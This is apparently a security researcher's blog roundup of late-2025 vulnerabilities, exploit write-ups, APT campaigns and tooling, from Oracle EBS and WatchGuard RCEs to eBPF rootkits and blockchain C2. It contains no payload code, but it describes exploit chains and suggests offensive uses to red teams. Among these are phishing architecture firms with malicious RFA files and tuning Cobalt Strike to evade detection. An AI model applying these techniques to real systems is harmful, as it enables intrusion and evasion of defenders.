zero-day

ZeroDay Field Notes - October-December 2025 Vulnerability and Exploit Highlights

An in-depth analysis of October-December 2025's major cybersecurity events, including pre-auth RCEs, rootkits on network switches, Windows 10's last free patches, and advanced tradecraft with blockchain C2 and AI phishing.

UncleSp1d3r

UncleSp1d3r

17 min read

UncleSp1d3r here. October was one of those months where the vulnerability pipeline ran hot and the exploit dev community actually shipped. We got pre-auth RCE chains in enterprise MFT platforms, rootkits on network switches, a final batch of Windows 10 patches that included actively exploited zero-days, and enough SQL injection paths in Ivanti Endpoint Manager to make you wonder if parameterized queries are still a thing. Then December rolled in with React blowing up, Android zero-days under targeted exploitation, and WinRAR's greatest hits being weaponized yet again.

What makes this batch interesting isn't the volume--it's the maturity. We're seeing full-chain PoCs with ROP gadgets and heap grooming, adversary-in-the-middle attacks via compromised network hardware, and blockchain-based C2 that survives domain takedowns. The offensive research coming out of watchTowr, Synacktiv, Doyensec, and ZDI is setting a new bar for public disclosure quality.

Let's dig into what actually moves the tradecraft forward.

Pre-Auth RCE: The October Triple Threat

Oracle E-Business Suite: SSRF to XSLT RCE (CVE-2025-61882)

Oracle's CVE-2025-61882 is a pre-authentication RCE affecting E-Business Suite 12.2.3 through 12.2.14, and it's been actively exploited by the Cl0p ransomware group since at least August. The vulnerability lives in the BI Publisher integration and chains three primitives: SSRF via the UiServlet endpoint, CRLF injection to bypass internal network restrictions, and finally XSLT injection to achieve arbitrary code execution.

watchTowr's teardown walks through the entire chain with HTTP payloads you can use for testing. The SSRF lets you make the server request internal URLs (like http://127.0.0.1/OA_HTML/configurator/), the CRLF injection smuggles attacker-controlled headers past input validation, and the XSLT payload uses Java's ScriptEngineManager to execute arbitrary commands. Cyderes reverse-engineered the exploit components and published hashes and detection logic for hunting. CISA added this to the KEV catalog with a federal remediation deadline.

The patch requires the October 2023 CPU as a prerequisite, which means if you're behind on Oracle updates, you've got a backlog to clear. For operators, the XSLT-to-Java-exec primitive is portable to other apps that accept user-controlled XSLT templates without sandboxing.

WatchGuard Fireware: IKEv2 Pre-Auth Root RCE (CVE-2025-9242)

watchTowr strikes again with a detailed PoC for CVE-2025-9242, a stack buffer overflow in WatchGuard's IKEv2 implementation affecting Fireware OS 11.10.2 through 12.11.3. The bug lives in the handling of overly long Identity (IDi) payloads during VPN negotiation--send more than 100 bytes in the IDi field and you overflow a fixed buffer in the iked daemon.

The writeup includes version fingerprinting techniques, ROP chain construction, and shellcode for gaining root on the appliance. The exploit requires knowledge of the IKEv2 PSK (pre-shared key), but watchTowr notes that many deployments use weak or default credentials. WatchGuard patched this back in September, but the detailed public PoC and GitHub tool mean unpatched firewalls are now trivial targets. CISA confirmed active exploitation and added it to the KEV catalog.

For red teams, this is a perfect perimeter foothold: pre-auth, remotely exploitable, and gives you root on the firewall itself--which means you control routing, can MITM traffic, and pivot to internal networks with impunity.

GoAnywhere MFT: Deserialization to Ransomware (CVE-2025-10035)

The third member of October's RCE trinity is CVE-2025-10035, a Java deserialization flaw in GoAnywhere MFT affecting versions prior to 7.8.4. Microsoft's threat intel group documented active exploitation by Storm-1175, who chained this bug into full Medusa ransomware deployment.

The attack sequence: exploit the public-facing license endpoint (/license) to achieve RCE, drop webshells (JSP backdoors), deploy RATs (SimpleHelp, MeshAgent), move laterally using RDP and credential dumping, exfiltrate data via Rclone to cloud storage, and finally deploy Medusa. Fortra's advisory confirms patches are available. CISA added this one to the KEV catalog too.

The lesson here is that MFT platforms are high-value targets because they sit at the boundary between partner networks and internal infrastructure, often handling sensitive data flows. If you've got GoAnywhere exposed, patch it, restrict access to the admin console, and hunt your logs for the IOCs Microsoft published.

Ivanti Endpoint Manager: A ZDI Disclosure Bonanza

October was rough for Ivanti. ZDI dropped thirteen authenticated SQL injection vulnerabilities in Endpoint Manager, most of which can be chained to remote code execution. The standout advisories:

All of these require authentication, but they share a common pattern: insufficient input validation in report generation and query functions that allows SQL injection, which can be escalated to OS command execution as the service account (typically SYSTEM or a high-privilege database role). Ivanti patched the lot in their October release.

For operators, this is a goldmine if you've already got low-privilege access to an Ivanti console--any authenticated user can leverage these to escalate. The CVSS scores hover around 7.2, but in practice, compromising the endpoint manager means you can push payloads to every managed device in the enterprise. That's a force multiplier.

Offensive Tooling and Tradecraft Research

Autodesk Revit RFA: From Crash to Full RCE

ZDI's exploit development writeup for CVE-2025-5037 is required reading for anyone interested in modern Windows x64 exploitation. The vulnerability is a type confusion in Revit's RFA (Revit Family Archive) file parser--specifically, how it handles AString deserialization in compressed OLE streams.

The researchers took a trivial crash (type confusion leading to incorrect pointer dereference) and built a reliable RCE exploit using:

  • Monster gadgets (complex ROP sequences that perform multiple operations)
  • Loop weird machines (ROP loops that iterate over attacker-controlled data structures)
  • Genetic algorithm-assisted gadget discovery to find chains that bypass ASLR and DEP

The writeup includes heap grooming techniques, stack pivot primitives, and a full working exploit. They also demonstrated supply-chain implications by backdooring the Axis Communications plugin for Revit, which would auto-update on user machines without any interaction beyond opening a malicious RFA file.

For red teams targeting architecture/engineering firms, this is your vector. RFA files are routinely shared via email and cloud storage, and users open them without hesitation because they're part of the normal workflow.

Linux ksmbd Kernel LPE: Deterministic Heap Grooming (CVE-2025-37947)

Doyensec's three-part series on exploiting CVE-2025-37947--an out-of-bounds write in the Linux kernel's ksmbd SMB server module--is a technical masterpiece. The bug occurs when extended attribute streams are enabled and an attacker sends a crafted SMB request with oversized stream metadata.

The exploit uses msg_msg kernel message spraying for deterministic heap grooming, creates a use-after-free condition, leaks kernel memory to defeat KASLR, and finally builds a ROP chain to execute a privilege escalation payload. The full PoC is on GitHub and targets Ubuntu 22.04 LTS (kernel 5.15.0-153-generic).

For operators, this is your ticket from SMB user to root on Linux boxes running vulnerable kernels. The technique is portable to similar heap allocation patterns in other kernel subsystems, and the writeup's coverage of msg_msg exploitation is a valuable primer.

TrustedSec: Windows Service Trigger Abuse

TrustedSec published research on alternative methods for starting Windows services without requiring SeServiceLogonRight or direct sc start commands. The techniques abuse built-in service triggers--named pipes, RPC endpoints, ETW providers, WNF notifications, and firewall events--to activate demand-start and manual-start services like RemoteRegistry, WebClient, and ClipSVC.

For example, you can trigger RemoteRegistry by connecting to its named pipe (\\.\pipe\winreg), which grants remote registry access without needing admin credentials. Similarly, WebClient can be activated by accessing its RPC endpoint, enabling WebDAV/SMB relay attacks.

The research includes Beacon Object Files (BOFs) in the CS-Situational-Awareness-BOF repo for querying and triggering services, plus examples using native Windows tools (sc qtriggerinfo, rpcping, etc.). For lateral movement and privilege escalation scenarios where you need to activate services stealthily, this is essential reading.

APT Campaigns: AI, Blockchain, and Open-Source Abuse

DPRK Adopts EtherHiding for C2

Mandiant's analysis of UNC5342--a DPRK-linked group--documents their use of EtherHiding, a technique that stores malicious JavaScript payloads in blockchain smart contract data. The campaign targets developers via fake job postings and npm packages, delivering the JADESNOW and INVISIBLEFERRET malware families.

Here's how it works: the initial infection vector is a malicious npm package or GitHub repo disguised as a coding interview or job application. Once executed, the JavaScript loader reads transaction data from the BNB Chain, Ethereum, and other blockchains using public APIs (BscScan, Etherscan). The attacker has pre-uploaded obfuscated payloads to the blockchain as transaction calldata, which the loader retrieves, decrypts (often with simple XOR), and executes in memory.

Because the payload is stored on an immutable public ledger, takedown is impossible. Even if you block the C2 domains, the malware can still fetch its next stage from the blockchain. The operational cost is minimal--around $1 per transaction--and the resilience is extraordinary. Mandiant published YARA rules and IOCs, but the real takeaway for offense is the C2 primitives: decentralized, tamper-proof, and publicly accessible infrastructure.

For a related technique, Ransom-ISAC documented Cross-Chain TxDataHiding, where DPRK operators hide payloads across TRON, Aptos, and BSC and decrypt them at runtime using XOR keys embedded in the loader. The GitHub repo includes detection rules and deobfuscation scripts.

UTA0388: LLM-Powered Spear-Phishing Meets DLL Hijacking

Volexity's APT Meets GPT report introduces UTA0388, a China-aligned group using large language models to scale spear-phishing campaigns. The attackers use LLMs to generate multilingual, contextually aware emails that build rapport with targets over multiple exchanges before delivering malicious attachments.

Once the victim opens a weaponized archive, the payload chain uses DLL search order hijacking (via Tablacus Explorer) to load GOVERSHELL, a custom Golang backdoor with five known variants. The malware persists via scheduled tasks (MyGoTask, SystemHealthMonitor) and supports command execution, polling/beaconing C2, and file operations.

For red teams, the AI-assisted phishing angle is worth exploring--modern LLMs can generate convincing lures at scale, and Volexity's findings suggest that detection based on grammar or phrasing alone is no longer viable. The DLL hijacking and Golang implant are standard but well-executed.

China-Nexus Groups Abuse Nezha RMM for Persistence

Huntress documented a campaign by China-linked actors exploiting phpMyAdmin log poisoning to deploy webshells, then using the open-source Nezha remote monitoring tool as a persistence mechanism. The infection chain: poison phpMyAdmin's error log with a PHP webshell payload, execute it via log file inclusion, use the webshell to download and install the Nezha agent as a Windows service, and finally deploy Ghost RAT for long-term C2.

Nezha is a legitimate infrastructure monitoring tool, which makes it blend in with normal administrative traffic. The C2 communication uses WebSockets over HTTPS, and the dashboard can be hosted on attacker-controlled servers or compromised infrastructure. Over 100 victims have been identified, primarily in the Asia-Pacific region.

For defenders, the IOCs include specific service names (httpd.exe launching unexpected child processes), registry keys, and network connections to Nezha dashboard IPs. For offense, this demonstrates effective reuse of open-source remote management tools as C2 frameworks--a technique we've seen with AnyDesk, MeshAgent, and others, but Nezha's lightweight agent and cross-platform support make it particularly attractive.

Linux & IoT: Rootkits in the Wild

LinkPro: eBPF Rootkit with Magic Packet Activation

Synacktiv's full analysis of LinkPro is one of the most detailed eBPF rootkit teardowns published this year. The malware was discovered on AWS EKS nodes following exploitation of Jenkins (CVE-2024-23897). It uses eBPF kernel hooks to hide processes, files, and network connections, and it activates via a magic TCP SYN packet (window size 54321).

The persistence mechanism is clever: the rootkit masquerades as a fake systemd service (systemd-resolveld.service--note the typo) and uses LD_PRELOAD to hook userspace tools like ps, netstat, and ls to hide its artifacts. The C2 supports shell access, file operations, and SOCKS5 pivoting.

For detection, Synacktiv provides YARA rules and suggests monitoring for unexpected eBPF programs (bpftool prog show), anomalous systemd units, and modifications to /etc/ld.so.preload. For offense, the eBPF stealth techniques and magic-packet activation are worth studying--this is the modern standard for Linux post-exploitation persistence.

Cisco Switches Get Rootkitted: Operation Zero Disco (CVE-2025-20352)

Trend Micro documented Operation Zero Disco, a campaign exploiting CVE-2025-20352--an authenticated SNMP buffer overflow in Cisco IOS/IOS XE--to deploy fileless rootkits on network switches. The exploit requires SNMP write access (which is often left at default private community strings), but once achieved, it grants full control of the switch.

The attackers deploy ARP spoofing modules, log tampering tools, and MITM proxies directly into the switch's memory. Because the rootkit is fileless and resides in volatile RAM, it survives until reboot--but in production networks, core switches rarely reboot. Cisco published patches in September 2025, but Trend Micro's research confirms active exploitation with SHA256 hashes for hunting.

For operators, owning the network infrastructure is the ultimate pivot point. From a compromised switch, you can intercept credentials, manipulate routing tables, and persist in a place where most EDR and logging tools have zero visibility.

Windows Patch Tuesday: The Last Free Ride for Win10

Microsoft's October 2025 Patch Tuesday was notable for being the final free security update for Windows 10. After October 14, 2025, continued patching requires Extended Security Updates (ESU), which means enterprises still running Win10 need to either migrate or pay up.

The release addressed 172 CVEs, including six zero-days, three of which were actively exploited:

  • CVE-2025-59230: Windows Remote Access Connection Manager (RasMan) EoP (CISA KEV)
  • CVE-2025-24990: Windows Agere Modem Driver (ltmdm64.sys) EoP (actively exploited, PoC available)
  • CVE-2025-24052: Another Agere modem driver flaw with public PoC

The Agere modem driver bugs are particularly interesting because Microsoft's fix was to simply remove the driver rather than patch the code. The driver supported legacy fax hardware, and removing it broke fax functionality for organizations still using dial-up modems in 2025 (yes, they exist). The exploits involve IOCTL buffer overflows that yield SYSTEM-level code execution from low-privileged contexts. r-tec IT Security and others have published technical details.

For red teams, these are classic local privilege escalation primitives. If you're doing physical assessments or have initial low-privilege access, kernel driver bugs remain a reliable path to full compromise.

Exploitation Primitives & Techniques

ZDI disclosed two related bugs in 7-Zip's ZIP file parser involving improper handling of symbolic links. By crafting a ZIP archive with symlinks that resolve outside the extraction directory, an attacker can write arbitrary files to locations like the Windows Startup folder. Both bugs were patched in 7-Zip 25.00.

The exploitation requires user interaction (the victim must extract the archive), but in enterprise environments where users routinely handle compressed files from partners and customers, that's a low bar. The technique works on Windows, macOS, and Linux builds of 7-Zip. For operators, this is a useful initial access or persistence primitive when you control file content but not execution context.

Public PoCs surfaced in November, and NHS England issued a warning about active exploitation attempts.

Gladinet CentreStack/Triofox: LFI to ViewState Deserialization RCE

Huntress broke down the exploitation of CVE-2025-11371, an unauthenticated LFI in Gladinet's CentreStack and Triofox file sync platforms. The bug lives in the /storage/t.dn handler, which fails to sanitize file path input. An attacker can request ../ traversal sequences to read arbitrary files under C:\Windows\Temp\glad_temp, including Web.config.

The Web.config file contains the ASP.NET machineKey, which can be used to forge ViewState payloads. By chaining the LFI with CVE-2025-30406 (ViewState deserialization), an attacker achieves unauthenticated remote code execution as SYSTEM. Patches are available (CentreStack 16.10.10408.56683 and updated Triofox builds), and CISA added this to the KEV catalog.

The interim mitigation is to disable the /storage/t.dn handler in Web.config if you can't patch immediately. For operators, this is a textbook example of chaining a seemingly low-impact info leak (LFI) into full RCE via cryptographic primitives. The pattern applies broadly to ASP.NET applications that expose machineKey or similar secrets.

Strapi JWT Authentication Bypass (CVE-2025-3930)

CERT Polska disclosed CVE-2025-3930, an authentication bypass in the Strapi headless CMS affecting versions prior to 5.24.1. The bug is simple but effective: Strapi's JWT implementation fails to revoke tokens after logout or account deactivation, and the /admin/renew-token endpoint is unauthenticated, allowing indefinite token renewal.

If you can intercept or steal a JWT (via XSS, CSRF, or session hijacking), you can maintain admin access forever--or at least until the server is patched. The default JWT expiration is 30 days, but token renewal resets the clock. Patches are available in Strapi 5.24.2 and 4.25.24.

For red teams, this is a persistence mechanism: once you have a valid JWT, you can renew it programmatically and maintain access even if the user logs out or an admin disables their account. For defenders, the mitigation is server-side token revocation (via a blacklist or database state) and reducing JWT expiration time to hours instead of days.

Android & Mobile Attack Surface

Pixnapping: GPU Side-Channel Steals Pixels (CVE-2025-48561)

Researchers from Carnegie Mellon, UC Berkeley, UC San Diego, and the University of Washington published Pixnapping, a GPU-based side-channel attack on Android 13-16 that allows unprivileged apps to infer and reconstruct screen pixels without requiring any permissions.

The attack exploits Android's GPU compositing pipeline and lossless compression timing. By measuring how long it takes the GPU to compress screen buffers, the app can infer pixel values and reconstruct sensitive content like 2FA OTPs and passwords--even from apps that set FLAG_SECURE to block screenshots.

Google issued a partial patch, but the researchers demonstrated a bypass. The full details and PoC are in the academic paper. For operators, this is a useful primitive for data exfiltration on Android when you have app-level access but can't get screen recording permissions. For defenders, there's no immediate mitigation beyond applying OS updates and hoping for vendor fixes.

Google Patches Two Actively Exploited Android Zero-Days (CVE-2025-48633, CVE-2025-48572)

Google's December 2025 Android Security Bulletin addressed over 100 vulnerabilities, including two zero-days confirmed under targeted exploitation:

  • CVE-2025-48633: Information disclosure in the Android Framework
  • CVE-2025-48572: Privilege escalation in the Android Framework

Both bugs affect Android 13, 14, 15, and 16, and Google confirmed that the exploits are being used in limited, targeted attacks. No technical details or PoCs have been published yet, but the fact that they're being actively exploited in the wild means they're high-value. Patches are available in the 2025-12-05 security patch level.

For operators running mobile assessments, keep an eye out for public PoCs once reverse engineering efforts catch up.

Blockchain and Crypto Tradecraft

Cross-Chain TxDataHiding: DPRK's Multi-Blockchain C2

Ransom-ISAC's deep-dive into Cross-Chain TxDataHiding shows DPRK operators distributing malware via fake GitHub job repos that use TRON, Aptos, and BSC blockchains to fetch obfuscated JavaScript payloads. The technique works like this:

  1. User clones a fake developer job repo or installs a malicious npm package
  2. Loader fetches specific blockchain transactions using public RPC endpoints (e.g., api.trongrid.io, bsc-dataseed.binance.org)
  3. Transaction calldata contains XOR-encrypted JavaScript
  4. Loader decrypts and executes, delivering a Node.js RAT

The RAT targets cryptocurrency wallet extensions, credential files, and browser sessions. Full IOCs, YARA rules, and a deobfuscation tool (PayloadFetcher.js) are available in the Ransom-ISAC GitHub repo.

For operators, this is an excellent evasion primitive. Blockchain APIs are generally allowlisted in corporate networks (they're used for crypto wallets and DeFi apps), and the cost of hosting payloads on-chain is negligible. It's also immune to traditional domain/IP blocklists.

Malware Deep Dives: Stealers, RATs, and Evasion

ValleyRAT Campaigns: DLL Side-Loading and Chinese Targeting

Multiple researchers documented ValleyRAT campaigns targeting Chinese-speaking users. Seqrite's Operation Silk Lure and CN-SEC's analysis show delivery via spear-phishing LNK files that extract VBS scripts, which then download a DLL side-loading chain. The final payload checks for the presence of WeChat or DingTalk registry keys to verify it's running on a Chinese system before activating.

The malware uses keytool.exe (a legitimate Java utility) to side-load a malicious jli.dll that decrypts and injects the RAT. Persistence is via scheduled tasks named Security or similar system-sounding names. ValleyRAT supports keylogging, screenshots, clipboard theft, and system recon.

Nextron Systems published another variant from the Silver Fox APT that trojanizes installers for Telegram, WinSCP, Chrome, and Microsoft Teams. This variant uses a BYOVD (Bring Your Own Vulnerable Driver) rootkit to terminate EDR processes and adds Windows Defender exclusions for entire drives before deploying ValleyRAT. The IOCs include a SHA256 hash (e80c3e4fc6ad0134bec666226561e138cdac4381740123d98f6662e72bf268db) and detailed TTPs available on OTX.

Maverick Banker: WhatsApp Worm with Donut Loaders

Kaspersky's analysis of Maverick shows a Brazilian banking trojan that self-propagates via WhatsApp. The initial infection is a PowerShell script delivered through phishing. Once executed, it uses Donut to load .NET shellcode, hijacks the victim's WhatsApp Web session using Selenium automation, and sends malicious messages to all contacts.

The payload targets Brazilian banks and cryptocurrency wallets using overlay attacks and clipboard hijacking. Kaspersky blocked over 62,000 infection attempts in early October. The C2 domains (casadecampoamazonas.com, sorvetenopote.com) are hardcoded, and the credentials for the C2 are embedded in the script--operational security is not this group's strong suit.

For operators testing social engineering chains, the WhatsApp propagation technique is portable. The use of Donut for in-memory .NET execution is a nice touch for evading signature-based detection.

Offensive Tooling Updates

nightMARE 0.16: Rizin-Powered Malware Analysis

Elastic Security Labs released nightMARE v0.16, a Python library for malware reverse engineering that integrates Rizin for disassembly and Unicorn for emulation. The library supports config extraction for 13 malware families, including LUMMA stealer.

The tutorial walks through extracting C2 domains and encryption keys from a packed LUMMA sample using dynamic emulation and memory analysis. For operators doing malware RE or building your own config extractors, this is a solid framework. The GitHub repo includes examples and plugins for common packers.

Autoswagger: OpenAPI/Swagger Endpoint Discovery and Fuzzing

Intruder.io released Autoswagger, a CLI tool for automated discovery and testing of OpenAPI and Swagger API endpoints. The tool enumerates common spec paths (/swagger.json, /openapi.json, /api-docs), parses the schema, and fuzzes endpoints to identify unauthenticated access, PII leaks, and exposed secrets.

For red teams doing API reconnaissance, this automates the tedious parts of endpoint enumeration and gives you a quick win list of publicly exposed admin functions and debug endpoints. The blog post includes case studies of real-world API misconfigurations discovered using the tool.

Cobalt Strike Detection: Certificate Fingerprinting

Censys published a guide to hunting Cobalt Strike C2 infrastructure via TLS certificate analysis. Cobalt Strike's certificate generation is predictable: self-signed certs with matching subject/issuer DNs and a fixed RDN ordering (C→ST→L→O→OU→CN). By querying internet-wide scan data for these patterns, researchers identified multiple active C2 servers, including infrastructure linked to known threat groups.

The blog includes Censys queries and IOC lists for defenders, but for offensive operators, the lesson is OPSEC: if you're running default CS profiles, your C2 is trivially fingerprintable. Customize your Malleable C2 profiles to randomize certificate fields and break the RDN pattern.

React RCE: The December Surprise (CVE-2025-55182)

While most of the dataset is from October, this one's too good to skip. React's security advisory for CVE-2025-55182 describes a pre-authentication remote code execution flaw in React Server Components (versions 19.0.0–19.2.0). The vulnerability affects react-server-dom-webpack, react-server-dom-parcel, and react-server-dom-turbopack, which are bundled into frameworks like Next.js, Vite, and others.

The bug is an unsafe deserialization issue in the server-side component transport layer. By sending a crafted request to a Server Function endpoint, an attacker can execute arbitrary code on the server with no authentication required. CVSS 10.0. Patches are available (React 19.0.1, 19.1.2, 19.2.1+), and hosting providers (Vercel, Cloudflare, Netlify) have deployed WAF rules as interim mitigations.

Public PoCs started appearing within hours of disclosure, though some are non-functional against production Next.js builds. For operators, this is a critical target if you're testing web apps built with modern React stacks. The Facebook security advisory and OSS-security mailing list discussion have more details.

Closing Thoughts: Build Chains, Not Exploits

October's crop of disclosures reinforced a core principle: the most effective attacks chain multiple primitives. Oracle's RCE required SSRF + CRLF + XSLT injection. Gladinet's exploit needed LFI + cryptographic primitive abuse. WatchGuard required IKEv2 knowledge + ROP + shellcode. And the APTs are chaining LLMs for phishing, DLL hijacking for execution, and blockchain transactions for C2.

The operators who succeed aren't necessarily the ones finding zero-days--they're the ones who can reliably chain known techniques into full compromise. That's what separates a crash from a shell, and a shell from persistent access with exfil.

So keep building your chains. Study the PoCs. Understand the primitives. And remember that every abstraction layer--whether it's ASP.NET ViewState, React Server Components, or eBPF hooks--is a potential seam to exploit.

The tradecraft is out there. Use it wisely.

-- UncleSp1d3r

Note: I wanted to get this out at the end of October, but November was a rollercoaster ride. We’ll start doing month-in-review rollups going forward.

Appendix: Vendor Patches & Advisories

For those tracking October's patch releases:

Microsoft October 2025 Patch Tuesday:

  • Security Update Guide – 172 CVEs including 6 zero-days
  • CVE-2025-59230 (RasMan EoP – CISA KEV)
  • CVE-2025-24990, CVE-2025-24052 (Agere driver EoPs – actively exploited)

Oracle:

Ivanti:

Fortra:

WatchGuard:

Cisco:

7-Zip:

Gladinet:

Strapi:

React:

Mozilla:

Adobe:

Fortinet:

Dell:

Read more